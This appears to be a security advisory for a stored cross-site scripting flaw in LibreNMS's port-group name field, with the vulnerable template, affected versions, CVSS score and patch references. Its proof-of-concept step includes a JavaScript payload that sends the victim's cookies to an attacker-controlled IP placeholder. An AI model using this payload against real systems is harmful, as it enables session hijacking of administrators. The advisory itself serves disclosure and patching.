CVE-2026-26992
EPSS 0.00%LibreNMS /port-groups name Stored Cross-Site Scripting
Description
### Summary **/port-groups name Stored Cross-Site Scripting** - HTTP POST - Request-URI(s): "/port-groups" - Vulnerable parameter(s): "name" - Attacker must be authenticated with "admin" privileges. - When a user adds a port group, an HTTP POST request is sent to the Request-URI "/port-groups". The name of the newly created port group is stored in the value of the name parameter. - After the port group is created, the entry is displayed along with some relevant buttons like Edit and Delete. ### Details The vulnerability exists as the name of the port group is not sanitized of HTML/JavaScript-related characters or strings. When the delete button is rendered, the following template is used to render the page: _resources/views/port-group/index.blade.php:_ ``` @extends('layouts.librenmsv1') @section('title', __('Port Groups')) @section('content') <div class="container-fluid"> <x-panel id="manage-port-groups-panel"> // [...Truncated...] @foreach($port_groups as $port_group) // [...Truncated...] <button type="button" class="btn btn-danger btn- sm" title="{{ __('delete Port Group') }}" aria-label="{{ __('Delete') }}" onclick="delete_pg(this, '{{ $port_group- >name }}', '{{ route('port-groups.destroy', $port_group->id) }}')"> // using the port's name in the Delete button functionality without sanitizing for XSS related characters/strings ``` As the device's name is not sanitized of HTML/JavaScript-related characters or strings, this can result in stored cross-site scripting. ### PoC - Login - Select Ports > Manage Port Groups - Select New Port Group - Input `12345');varpt=newImage();pt.src='http://<ATTACKER_IP>/cookiePG'.concat(document.cookie);document.body.appendChild(pt);delete_pg(this, '12345 into the "Name" input box (change <ATTACKER_IP> to be an the IP of an attacker controlled webserver)` - Select Save - Select the Delete Icon for the newly created Port Group - Select OK - The JavaScript payload is not sanitized and an HTTP request will be sent to the attacker controlled server, leaking the user's cookies.
Affected packages (1)
- Packagist/librenms/librenmsfrom 0, < 26.2.0
CVSS scores
| Source | Version | Severity | Vector |
|---|---|---|---|
| osv | CVSS 4.0 | — | CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N |
References (6)
- ADVISORYhttps://nvd.nist.gov/vuln/detail/CVE-2026-26992
- PATCHhttps://github.com/librenms/librenms
- WEBhttps://github.com/librenms/librenms/commit/882fe6f90ea504a3732f83caf89bba7850a5699f
- WEBhttps://github.com/librenms/librenms/pull/19042
- WEBhttps://github.com/librenms/librenms/releases/tag/26.2.0
- WEBhttps://github.com/librenms/librenms/security/advisories/GHSA-93fx-g747-695x